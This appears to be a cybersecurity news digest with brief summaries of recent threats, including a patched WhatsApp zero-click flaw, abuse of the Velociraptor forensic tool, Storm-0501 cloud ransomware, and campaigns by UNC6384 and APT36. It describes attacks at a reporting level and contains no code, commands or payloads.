Current Cyber Threats

WhatsApp Patches Vulnerability Exploited in Zero-Day Attacks

WhatsApp has addressed a critical "zero-click" security vulnerability (CVE-2025-55177) in its iOS and macOS clients. This flaw, which affects WhatsApp for iOS prior to version 2.25.21.73 and WhatsApp for Mac v2.25.21.78, allowed an attacker to remotely trigger the processing of content from an arbitrary URL on a target's device without any user interaction.









Velociraptor Incident Response Tool Abused for Remote Access

In August 2025, researchers from Sophos analyzed an intrusion where attackers deployed the legitimate open-source Velociraptor digital forensics and incident response tool. Instead of using it for defense, the attackers abused Velociraptor to download and run Visual Studio Code with the tunneling feature enabled, likely to create a connection back to their command-and-control server.


Storm-0501 Hackers Shift to Ransomware Attacks in the Cloud

In a recent attack, Storm-0501 infiltrated a large enterprise with multiple subsidiaries and inconsistent Microsoft Defender deployment. After gaining domain administrator access, the group conducted reconnaissance to identify unprotected systems, used tools like Evil-WinRM for lateral movement, and performed a DCSync attack to harvest privileged credentials.











Zipline Campaign: A Sophisticated Phishing Attack Targeting US Companies

Check Point Research identified a sophisticated social-engineering campaign, dubbed ZipLine, targeting U.S.-based manufacturing and supply chain–critical companies. Instead of sending phishing emails directly, the attackers initiate contact through corporate “Contact Us” forms, prompting the victim to respond first, an inversion of the normal phishing flow that enhances legitimacy.


UNC6384 Deploys PlugX via Captive Portal Hijacks and Valid Certificates Targeting Diplomats

In March 2025, Google Threat Intelligence Group identified a sophisticated cyber espionage campaign attributed to the PRC-nexus threat actor UNC6384. The campaign primarily targeted diplomats in Southeast Asia but also extended to other organizations worldwide, reflecting the broader strategic interests of the People's Republic of China.


Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing

An ongoing cyber-espionage campaign has been attributed to the Pakistan-based threat group APT36 (Transparent Tribe), after being observed actively targeting Indian government entities. The group is using sophisticated and flexible tactics, including spear-phishing emails containing malicious .desktop shortcut files for initial access.


















Threat Spotlight: Split and Nested QR Codes Fuel New Generation of ‘Quishing' Attacks

Recent research highlights how attackers are evolving their QR code phishing, or “quishing,” tactics to stay ahead of security defenses. While the general concept of using QR codes to lure users to credential-stealing websites is well understood, threat actors are now deploying more advanced techniques that complicate detection and mitigation.









Lockbit Linux ESXi Ransomware Variant Evasion Techniques, File Encryption Process Uncovered

Hack & Cheese and Trend Micro researchers recently reversed engineered the Linux variant of LockBit ransomware, designed to target VMware ESXi servers. Based on the analysis, this variant comes with advanced evasion capabilities and encryption methods that make it a suitable tool for actors to target virtualized environments.